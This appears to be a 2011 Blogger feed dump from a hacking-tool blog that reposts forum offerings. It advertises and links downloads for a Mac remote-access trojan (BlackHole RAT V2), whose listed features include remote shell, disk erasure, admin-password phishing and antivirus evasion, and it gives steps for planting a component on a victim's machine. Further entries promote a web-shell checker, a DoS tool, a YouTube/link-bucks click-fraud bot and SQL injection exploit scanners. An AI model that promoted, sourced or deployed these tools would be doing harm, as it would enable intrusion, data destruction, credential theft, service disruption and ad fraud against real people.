&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/HIPw_Bu66i6ywdVhP1_V1-FyW80/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HIPw_Bu66i6ywdVhP1_V1-FyW80/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/HIPw_Bu66i6ywdVhP1_V1-FyW80/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HIPw_Bu66i6ywdVhP1_V1-FyW80/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/3oUVMA9ZJA4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/1247320336408143150/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/icrypt-err0r-version.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1247320336408143150?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1247320336408143150?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/3oUVMA9ZJA4/icrypt-err0r-version.html" title="iCrypt Err0r Version" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/icrypt-err0r-version.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ECRn48fip7ImA9WhZaE0o.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-4462432624353543774</id><published>2011-04-23T05:03:00.001-07:00</published><updated>2011-06-29T11:21:07.076-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-29T11:21:07.076-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="best hacking tools" /><title>FREE Online Shell Checker [ Fast ][ VERY Reliable ][ Good for People With Slow Internet]</title><content type="html">&lt;span style="font-size: medium;"&gt;&lt;span style="color: dodgerblue;"&gt;Hey, so here is an online shell checker&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hf-alex.com/test/" target="_blank"&gt;http://hf-alex.com/test/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Please do not click the "submit" button more than once and WAIT for it to load&lt;br /&gt;
&lt;br /&gt;
I have used Curl so it should be fast and reliable &lt;br /&gt;
&lt;br /&gt;
This is made more for reliability more than speed&lt;br /&gt;
&lt;br /&gt;
this scans about 100 links in about 15-25 seconds&lt;br /&gt;
&lt;br /&gt;
Once you see the submit button disappear the scan has finished.. &lt;br /&gt;
&lt;br /&gt;
The working urls will be in the box &lt;br /&gt;
&lt;br /&gt;
This is very good for people with slow internet because all the checks  are done server-side, that means all you have to do is wait for the  checks to be done. The webpage is very small so it doesnt take up much  bandwidth at all!&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Georgia, serif; font-size: 16px;"&gt;&lt;b&gt;&lt;a href="http://hackguide4u.blogspot.com/"&gt;http://hackguide4u.blogspot.com&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; Have fun and please say thanks if you used it :)&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 16px;"&gt;&lt;b&gt;&lt;a href="http://hackguide4u.blogspot.com/"&gt;http://hackguide4u.blogspot.com&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-4462432624353543774?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/5dnYYoKDq3Llbb8AjUqgkOVOVl4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5dnYYoKDq3Llbb8AjUqgkOVOVl4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/5dnYYoKDq3Llbb8AjUqgkOVOVl4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5dnYYoKDq3Llbb8AjUqgkOVOVl4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/yQ8aJGKlZRY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/4462432624353543774/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/free-online-shell-checker-fast-very.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4462432624353543774?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4462432624353543774?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/yQ8aJGKlZRY/free-online-shell-checker-fast-very.html" title="FREE Online Shell Checker [ Fast ][ VERY Reliable ][ Good for People With Slow Internet]" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/free-online-shell-checker-fast-very.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0ABQHo8eCp7ImA9WhZQFUg.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-3918584647484175743</id><published>2011-04-23T04:55:00.001-07:00</published><updated>2011-04-23T04:55:51.470-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T04:55:51.470-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="best hacking tools" /><title>Pre-Release] BlackHole RAT V2 [Test-Version]</title><content type="html">Okay.. because some people have asked me "whats up with the next Version?" I will upload a Test-Version of the BlackHole RAT V2.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orangered;"&gt;This Version is a little bit complicated to install and its untested!!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
So what can you do with this Version?&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;- Execute Shell Comands remotly&lt;br /&gt;
- Chat with slave&lt;br /&gt;
- Read some Text on the slave Computer&lt;br /&gt;
- Display a Message&lt;br /&gt;
- Erase the HD&lt;br /&gt;
- Phish the Admin Password&lt;br /&gt;
- Block the Activity Monitor (after succsessfully phished Admin Pass)&lt;br /&gt;
- Shutdown, Reboot, Sleep and kill the Finder.app&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
What does this Version do?&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;- Adds itself to the Startup Items&lt;br /&gt;
- Is at the moment FUD&lt;br /&gt;
- Hidden From Dock, runs in background&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
What are the known Problems?&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orangered;"&gt;- Installation is a little bit complicated&lt;br /&gt;
- Server opens many Ports&lt;br /&gt;
- On every boot there will pop up a Window&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Known Bugs?&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orangered;"&gt;- Server crashes when closing the Chat&lt;br /&gt;
- iSight Photo is not send complete&lt;br /&gt;
- ScreenShot function does not work in this Version&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Okay now You know that all.. but this is only to show you what you can  do with this on a Mac Computer. I will try to fix all Bugs and Problems  as fast as I can.&lt;br /&gt;
&lt;br /&gt;
Installation:&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: dodgerblue;"&gt;1. Start the Install.command&lt;br /&gt;
2. Drag&amp;amp;Drop the Files asked in the Terminal Window&lt;br /&gt;
3. After Installation finished, close the Terminal and reboot&lt;br /&gt;
4. Connect with the Client&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
To use the Block Activity Window Function, do this:&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: dodgerblue;"&gt;1. Open the Block Script with Apple-ScriptEditor&lt;br /&gt;
2. Enter the slave Admin Pass where it says "enteradminpasswordhere"&lt;br /&gt;
3. Save as Programm named "Block"&lt;br /&gt;
4. Copy to /Applications/JavaUpdater/Data/Block.app on the Victims Computer&lt;br /&gt;
5. Now you can use the Block function with the Client&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
I hope you will like this.&lt;img alt="Thumbsup" border="0" src="http://hfmaxcdn.witza.netdna-cdn.com/images/blackreign/images/smilies/thumbsup.gif" style="vertical-align: middle;" title="Thumbsup" /&gt;&lt;br /&gt;
&lt;br /&gt;
Note: &lt;span style="color: limegreen;"&gt;The Client works on Windows AND Mac.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Here are some pics:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;div class="spoiler_header"&gt;Spoiler &lt;a href=""&gt;(Click to Hide)&lt;/a&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;a href="http://img163.imageshack.us/i/bild1nt.png/" target="_blank"&gt;pic1&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://img821.imageshack.us/i/bild2hw.png/" target="_blank"&gt;pic2&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://img835.imageshack.us/i/bild3sl.png/" target="_blank"&gt;pic3&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
And here is the Total Virus scan:&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;div class="spoiler_header"&gt;Spoiler &lt;a href=""&gt;(Click to Hide)&lt;/a&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;a href="http://www.virustotal.com/file-scan/report.html?id=e105f22969b5382b41b8446c4692326b56bae85462e28fead78eef2682ff8ac7-1301753913" target="_blank"&gt;freeze.exe&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.virustotal.com/file-scan/report.html?id=c418fb60a6371bf1f493250d5e9e14ede41a91ad577ac3f7881e3f993cfc4af0-1301754134" target="_blank"&gt;freeze admin tools.exe&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
I hope you will like it;)&lt;br /&gt;
&lt;br /&gt;
Downloadlink: &lt;a href="http://www.mediafire.com/?3nzk25p2jz8gjd1" target="_blank"&gt;http://www.mediafire.com/?3nzk25p2jz8gjd1&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-3918584647484175743?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/UoVJx9Ky36OES_H2t9ht2tXYUXw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UoVJx9Ky36OES_H2t9ht2tXYUXw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/UoVJx9Ky36OES_H2t9ht2tXYUXw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UoVJx9Ky36OES_H2t9ht2tXYUXw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/be5NV-Ufg4c" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/3918584647484175743/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/pre-release-blackhole-rat-v2-test.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/3918584647484175743?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/3918584647484175743?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/be5NV-Ufg4c/pre-release-blackhole-rat-v2-test.html" title="Pre-Release] BlackHole RAT V2 [Test-Version]" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/pre-release-blackhole-rat-v2-test.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0EAQ30_eCp7ImA9WhZQFUg.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-4189739029942249581</id><published>2011-04-23T04:54:00.000-07:00</published><updated>2011-04-23T04:54:02.340-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T04:54:02.340-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bot" /><title>Youtube Link-bucks click increaser - [2000+ REAL clicks]</title><content type="html">&lt;div class="post_body" id="pid_11404357"&gt;      The view increaser feature in my youtube bot doesn't work as well  as it use to ever since youtube's recent updates so i tested how well it  would work on link-bucks and it makes 2000+ clicks per day, think i  should add a link-bucks clicker feature to my bot? is 2000+ clicks any  good?     &lt;/div&gt;&lt;hr style="background: #000; width: 20%;" /&gt; &lt;div style="max-height: 200px; overflow: hidden;"&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.ytbot.com/" target="_blank"&gt;&lt;img alt="[Image: logo_4.jpg]" border="0" src="http://i.imagehost.org/0297/logo_4.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-4189739029942249581?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/0bFdLzzEL0PcsEsdXDkDghXNG-0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/0bFdLzzEL0PcsEsdXDkDghXNG-0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/0bFdLzzEL0PcsEsdXDkDghXNG-0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/0bFdLzzEL0PcsEsdXDkDghXNG-0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/fdQZHoA1kdQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/4189739029942249581/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/youtube-link-bucks-click-increaser-2000.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4189739029942249581?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4189739029942249581?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/fdQZHoA1kdQ/youtube-link-bucks-click-increaser-2000.html" title="Youtube Link-bucks click increaser - [2000+ REAL clicks]" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/youtube-link-bucks-click-increaser-2000.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IBRn85fip7ImA9WhZQFUg.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-8029362666858366973</id><published>2011-04-23T04:52:00.000-07:00</published><updated>2011-04-23T04:52:37.126-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T04:52:37.126-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="best hacking tools" /><title>TeV DoS Tool | Easy DoS</title><content type="html">This easy DoS tool was made by Elixed_ in java.&lt;br /&gt;
Direct download: &lt;a href="https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar" target="_blank"&gt;https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Mirrors:&lt;/span&gt; &lt;br /&gt;
&lt;div&gt;&lt;div class="spoiler_header"&gt;Spoiler &lt;a href="http://www.blogger.com/post-edit.g?blogID=4252702633268366782&amp;amp;postID=8029362666858366973"&gt;(Click to View)&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;Virus scan: &lt;a href="http://vscan.novirusthanks.org/analysis/94ecd2db28320bcc800e5e1e96b0fdf1/dGV2ZG9zLWV4ZQ==/" target="_blank"&gt;http://vscan.novirusthanks.org/analysis/...zLWV4ZQ==/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
No idea why that moron virus scanner says that its a virus lol.&lt;br /&gt;
&lt;br /&gt;
Created this almost a year ago, just found it at my old laptop and was like, why not post on HF.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;
It only go down for you when your own internet is shit. Else it will be down for everyone, it uses your internet connection.&lt;br /&gt;
&lt;a href="http://www.downforeveryoneorjustme.com/" target="_blank"&gt;http://www.downforeveryoneorjustme.com/&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
For the people that really wants a screen:&lt;br /&gt;
&lt;div&gt;&lt;div class="spoiler_header"&gt;Spoiler &lt;a href="http://www.blogger.com/post-edit.g?blogID=4252702633268366782&amp;amp;postID=8029362666858366973"&gt;(Click to Hide)&lt;/a&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;img alt="[Image: iGa0L.png]" border="0" src="http://i.imgur.com/iGa0L.png" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-8029362666858366973?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nxvXAdFy6ReQLJaPo7LAwBjGfSs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nxvXAdFy6ReQLJaPo7LAwBjGfSs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nxvXAdFy6ReQLJaPo7LAwBjGfSs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nxvXAdFy6ReQLJaPo7LAwBjGfSs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/ORYdBZ390tg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/8029362666858366973/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/tev-dos-tool-easy-dos.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/8029362666858366973?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/8029362666858366973?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/ORYdBZ390tg/tev-dos-tool-easy-dos.html" title="TeV DoS Tool | Easy DoS" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/tev-dos-tool-easy-dos.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUAMQH0yeip7ImA9WhZSFkk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-3344228779211294648</id><published>2011-04-01T00:43:00.000-07:00</published><updated>2011-04-01T00:43:01.392-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-01T00:43:01.392-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tools" /><title>Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool</title><content type="html">&lt;div class="post_body" id="pid_8721751"&gt;      Greetings All,&lt;br /&gt;
&lt;br /&gt;
After a very successfull release of Sql Poizon v1.0, The Exploit &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Scanner&lt;/span&gt;  Tool, I am hereby introducing you with the new release which is more  handy. It has new features as well as bug fixes from the older release.  Please take a look for it below:&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="color: orange;"&gt;New Features:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
"Look n Feel" is more attractive now.&lt;br /&gt;
Rich "Context Menu" items.&lt;br /&gt;
"Results" contain checkboxes to enable selection.&lt;br /&gt;
"Selected Dork" box is editable now for user convenience.&lt;br /&gt;
Built-in Browser for "Injection Builder" to check the impact of injection.&lt;br /&gt;
"Text Bucket" available for "Injection Builder" to save extra data.&lt;br /&gt;
"Insert Order By" button is added to "Injection Builder".&lt;br /&gt;
"Internet Browser" with Snapshot and HTML DOM Tree.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="color: orangered;"&gt;Bug Fixes:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.&lt;br /&gt;
Progress bar for "Crawler" has been fixed. It will show correct progress now.&lt;br /&gt;
Error on importing file is fixed now. You can import files from other directories as well.&lt;br /&gt;
"Searchqu" shows invalid results. It is fixed now.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: goldenrod;"&gt;Sql Poizon v1.1 - Sqli Exploit &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Scanner&lt;/span&gt;, Search Hunter, Injection Builder Tool&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="[Image: scannert.png]" border="0" src="http://img89.imageshack.us/img89/3432/scannert.png" /&gt;&lt;br /&gt;
&lt;img alt="[Image: crawler.png]" border="0" src="http://img12.imageshack.us/img12/951/crawler.png" /&gt;&lt;br /&gt;
&lt;img alt="[Image: injectionbuilder.png]" border="0" src="http://img140.imageshack.us/img140/1140/injectionbuilder.png" /&gt;&lt;br /&gt;
&lt;img alt="[Image: browsere.png]" border="0" src="http://img839.imageshack.us/img839/3060/browsere.png" /&gt;&lt;br /&gt;
&lt;img alt="[Image: sqlerrorlist.png]" border="0" src="http://img705.imageshack.us/img705/985/sqlerrorlist.png" /&gt;&lt;br /&gt;
&lt;img alt="[Image: aboutdx.png]" border="0" src="http://img571.imageshack.us/img571/7681/aboutdx.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Download:&lt;br /&gt;
&lt;img alt="[Image: injectionorange.png]" border="0" src="http://img43.imageshack.us/img43/2372/injectionorange.png" /&gt;&lt;a href="http://rapidshare.com/files/440158132/Sql_Poizon_v1.1_-_Sqli_Exploit_Scanner_Tool.rar" target="_blank"&gt;Link&lt;/a&gt;&lt;br /&gt;
Please rate me for this.&lt;br /&gt;
&lt;br /&gt;
p0!z0neR     &lt;/div&gt;&lt;hr style="background: #000; width: 20%;" /&gt; &lt;div style="max-height: 200px; overflow: hidden;"&gt;&lt;span style="font-family: Verdana;"&gt;&lt;span style="font-size: xx-small;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: skyblue;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: steelblue;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="post_meta" id="post_meta_8721751"&gt;          &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-3344228779211294648?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/e1dWRWhjbZsn3jzGvPDwyfVM2Lo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/e1dWRWhjbZsn3jzGvPDwyfVM2Lo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/e1dWRWhjbZsn3jzGvPDwyfVM2Lo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/e1dWRWhjbZsn3jzGvPDwyfVM2Lo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/ulvexzyTgW0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/3344228779211294648/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/sql-poizon-v11-sqli-exploit-scanner.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/3344228779211294648?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/3344228779211294648?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/ulvexzyTgW0/sql-poizon-v11-sqli-exploit-scanner.html" title="Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/sql-poizon-v11-sqli-exploit-scanner.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUAEQXY8fip7ImA9WhZSFkk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-9202956503678869896</id><published>2011-04-01T00:41:00.001-07:00</published><updated>2011-04-01T00:41:40.876-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-01T00:41:40.876-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL INJECTION" /><title>xuhaid SQLi Scanner V3</title><content type="html">&lt;span style="font-weight: bold;"&gt;xuhaid SQLi Scanner V3 ✩&lt;br /&gt;
--Status:[&lt;span style="color: darkgreen;"&gt;online&lt;/span&gt;]--&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: saddlebrown;"&gt;&lt;br /&gt;
I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!&lt;br /&gt;
Side Note: Better dork = more results! Keep that in mind!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Ok In This Version We have 2 New Scanner's Public &amp;amp; Private ... And  In this Version I have added Duplicate Link remover Soo that after  scanning you guys can easily remove duplicate Links.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;Private Online SQLi Scanner V1&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.sqlscanner.info/v1.php" target="_blank"&gt;*Click here to Access*&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;Public Online SQLi Scanner V1&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://sqlscanner.info/Public-Sql-Scanner/Publicv1.php" target="_blank"&gt;*Click here to Access*&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
